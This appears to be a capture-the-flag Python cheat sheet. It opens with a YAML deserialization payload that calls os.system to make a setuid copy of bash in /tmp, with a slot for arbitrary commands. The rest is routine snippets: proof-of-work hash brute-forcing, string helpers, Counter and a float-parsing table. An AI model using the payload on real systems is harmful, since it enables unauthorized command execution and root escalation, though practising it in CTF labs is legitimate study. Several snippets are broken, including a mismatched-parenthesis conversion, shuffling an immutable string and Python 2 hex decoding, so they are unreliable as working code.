PYTHON
Vulnerability
Load yaml
!!python/object/new:os.system [cp /bin/bash /tmp/bash;chmod u+s /tmp/bash] !!python/object/new:os.system [<RUN COMMAND IN HERE>]
Technique
Find hex from a specific known SHA value in
SHA256
Using hashlib
import hashlib import random h=None while(h is None or h[-5:]!='512bf'): p=random.randrange(1, 0xffffffffffffffffffffffff) h=hashlib.sha256(p.to_bytes(12, 'big')).hexdigest() print('SHA256(' + hex(p) + ')=' + h)
Using pwntools
from pwn import * pwnlib.util.iters.mbruteforce(lambda x: hashlib.sha256(x).hexdigest()[-5:] == hash , string.ascii_lowercase, length = 10)
Read file
# Read and decode hex
output = open("output.txt","r").read().decode('hex')
Get printable strings
import string
# Uppercase ['A','B',...]
UPPER = list(string.ascii_uppercase)
# Lowercase['a','b',...]
LOWER = list(string.ascii_lowercase)
# All ASCII
ALL = list(string.printable)
Shuffle strings
import random
TEMP = "abcdefg"
random.shuffle(TEMP)
Counter Library
from collections import Counter, OrderedDict
freq = Counter("abbbccccdd")
# Sorted By Descending Order
sorted(freq.items(), key=lambda i: i[1], reverse=True)
# => Output = ('c', 4), ('b', 3), ('d', 2), ('a', 1)]
Conversion
#Binary to hex
dec_str2 = format(int('0100010000'), 2),'x')
dec_str2.rjust(4,'0')
print(dec_str2)
String to Float/Int
val is_float(val) Note
-------------------- ---------- --------------------------------
"" False Blank string
"127" True Passed string
True True Pure sweet Truth
"True" False Vile contemptible lie
False True So false it becomes true
"123.456" True Decimal
" -127 " True Spaces trimmed
"\t\n12\r\n" True whitespace ignored
"NaN" True Not a number
"NaNanananaBATMAN" False I am Batman
"-iNF" True Negative infinity
"123.E4" True Exponential notation
".1" True mantissa only
"1,234" False Commas gtfo
u'\x30' True Unicode is fine.
"NULL" False Null is not special
0x3fade True Hexadecimal
"6e7777777777777" True Shrunk to infinity
"1.797693e+308" True This is max value
"infinity" True Same as inf
"infinityandBEYOND" False Extra characters wreck it
"12.34.56" False Only one dot allowed
u'四' False Japanese '4' is not a float.
"#56" False Pound sign
"56%" False Percent of what?
"0E0" True Exponential, move dot 0 places
0**0 True 0___0 Exponentiation
"-5e-5" True Raise to a negative number
"+1e1" True Plus is OK with exponent
"+1e1^5" False Fancy exponent not interpreted
"+1e1.3" False No decimals in exponent
"-+1" False Make up your mind
"(1)" False Parenthesis is bad
References
Last updated